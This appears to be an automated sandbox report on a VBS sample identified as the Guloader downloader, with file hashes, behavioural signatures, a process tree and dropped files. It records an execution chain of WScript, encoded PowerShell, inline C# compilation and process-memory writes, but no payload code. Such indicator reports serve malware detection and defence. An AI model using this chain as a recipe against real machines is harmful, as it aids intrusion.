Analysis
- max time kernel: 87s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20221111-en
- resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
- submitted: 29-12-2022 07:10

Static task: static1

Behavioral task: behavioral1
- Sample: f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
- Resource: win7-20221111-en

Behavioral task: behavioral2
- Sample: f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
- Resource: win10v2004-20220812-en
General
- Target: f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
- Size: 123KB
- MD5: ca12931ef2bc25a747d2586e8e199f65
- SHA1: 799394f1f0cc8b19c38f4ad6272d9b732f51e60e
- SHA256: f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f
- SHA512: daf8d9da424972116152f15710310b1b26fdbdb29e8f7514982bf2d5585fc856771742d525eced4422a8667eddbd9f360b066610b6e753045f53c8380b604134
- SSDEEP: 1536:FKQ1kslYluZNA03kyNYzF9AtbSF/DwJQAXR8GYpX5JcogiVvKaj7/yuJNUoBqZTr:FER0gAg9FsewJEk3dP6e8A
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (PID 576)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 576), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: WScript.exe, powershell.exe, csc.exe

  | Description | PID | Process | Target process |
  |---|---|---|---|
  | PID 1096 wrote to memory of 576 | 1096 | WScript.exe | powershell.exe |
  | PID 1096 wrote to memory of 576 | 1096 | WScript.exe | powershell.exe |
  | PID 1096 wrote to memory of 576 | 1096 | WScript.exe | powershell.exe |
  | PID 1096 wrote to memory of 576 | 1096 | WScript.exe | powershell.exe |
  | PID 576 wrote to memory of 1688 | 576 | powershell.exe | csc.exe |
  | PID 576 wrote to memory of 1688 | 576 | powershell.exe | csc.exe |
  | PID 576 wrote to memory of 1688 | 576 | powershell.exe | csc.exe |
  | PID 576 wrote to memory of 1688 | 576 | powershell.exe | csc.exe |
  | PID 1688 wrote to memory of 1220 | 1688 | csc.exe | cvtres.exe |
  | PID 1688 wrote to memory of 1220 | 1688 | csc.exe | cvtres.exe |
  | PID 1688 wrote to memory of 1220 | 1688 | csc.exe | cvtres.exe |
  | PID 1688 wrote to memory of 1220 | 1688 | csc.exe | cvtres.exe |
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vsqyepgx.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1142.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1141.tmp"
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES1142.tmp
  Filesize: 1KB
  MD5: 5b8f19e3314564c9cb2c8bf8d80d7807
  SHA1: 7829665e521f70f4bf11f473fd46628d4ca98312
  SHA256: 2912e1327ff4eb1c80fae260f7d79e641d43be6048ece835e8fbf239bbc889cd
  SHA512: c91e84c2264244e03117c428f2ddfdbd3050fb9bbaac742b49e75f5f25bc7d6f3246e8fc1a0897f08485bf27829bbd881df466d4de94984fa6bdb229c2255ccc
- C:\Users\Admin\AppData\Local\Temp\vsqyepgx.dll
  Filesize: 3KB
  MD5: c2dec39245abbb8614be55a2c7920b1e
  SHA1: 28deb76ffb6517b39345dd7e202939e57ff53983
  SHA256: 80de4069a261fab0b932cb0e308fb02848b66d7ad1f06b07a1150328cfbb8ede
  SHA512: 6262ee5befb9745fe2f87cee6506bb813a8b8ea693468ca92f6c9b333428f30da1622f64c9b0e7b398c3ffd77ca93f45df35c63072bfcb1371c2f646e72bbc0e
- C:\Users\Admin\AppData\Local\Temp\vsqyepgx.pdb
  Filesize: 7KB
  MD5: 2f1126f1e2c110eb7067b9831c91f0f7
  SHA1: 7306b78101247b1c88e6fa58cbee830971eea44c
  SHA256: f0f0ee93a0e61c53ef971d51cbd13b0cd42358e3d5ad8b31687bced7cbb5ddaf
  SHA512: c6d4f6fa281a26e31f356ad6ba0c9488086b912db54e9be591d8bf712455fdcb98f03d2d12f60fa7b601599b1895ca10091e88c0347a7119a39c59d8900b15a7
- \??\c:\Users\Admin\AppData\Local\Temp\CSC1141.tmp
  Filesize: 652B
  MD5: 69ee8eaa272fd987c3f81548f772d7f9
  SHA1: e9ca9513c71fd974c7ac41400cbe06cf628c43e8
  SHA256: 2fb030c9508e6457f8725a42317b8b553a357b1abbb9981dd3f9fe3169e8e7d6
  SHA512: 4fcb435c03c42cbe549b0636cd9323688c74aea4e8d2f3a556737bd726fad964a882b862579197dc815cdabd7798318d7350bfeb6a32447dbec31e63a0dbb1af
- \??\c:\Users\Admin\AppData\Local\Temp\vsqyepgx.0.cs
  Filesize: 615B
  MD5: 1b2f119b151022bb977fb9d85ae015c7
  SHA1: 2be4ce4b0a74fad4c260fc9a56d163bcee6d5587
  SHA256: 2c64726434fdab138a011da7c7e6433aaca47fc0a706a36cd0ea459a5f58c7dd
  SHA512: ba78074ee8673b7a5318654afc5c94b5c0daef3999e627286e65447a0c16591af03d5dd06284fbb5d72d29e04c3d35403a34f0db333d555c4456c00930df5a42
- \??\c:\Users\Admin\AppData\Local\Temp\vsqyepgx.cmdline
  Filesize: 309B
  MD5: 9910527cdbc6a0cceac59e5ff6d62d30
  SHA1: 8b2a45227a897fc47423e33b8c5f3438b15bfb29
  SHA256: 529afecb5b0570787dc85ea6d2157d4c67bcf395045281f0c2bd6706de8c9ce6
  SHA512: d9fc3a9814ed3795142a328d7a2052c1d6f8f203f798aeb6660df9513d65743b61ac16d78ffd06d5152ba9c33b5a093184fc0f6fcacf679353fda4be982d0ec4
- memory/576-57-0x0000000074620000-0x0000000074BCB000-memory.dmp
  Filesize: 5.7MB
- memory/576-56-0x00000000767D1000-0x00000000767D3000-memory.dmp
  Filesize: 8KB
- memory/576-55-0x0000000000000000-mapping.dmp
- memory/576-66-0x0000000004FE0000-0x00000000050E0000-memory.dmp
  Filesize: 1024KB
- memory/576-67-0x0000000074620000-0x0000000074BCB000-memory.dmp
  Filesize: 5.7MB
- memory/1096-54-0x000007FEFC421000-0x000007FEFC423000-memory.dmp
  Filesize: 8KB
- memory/1220-61-0x0000000000000000-mapping.dmp
- memory/1688-58-0x0000000000000000-mapping.dmp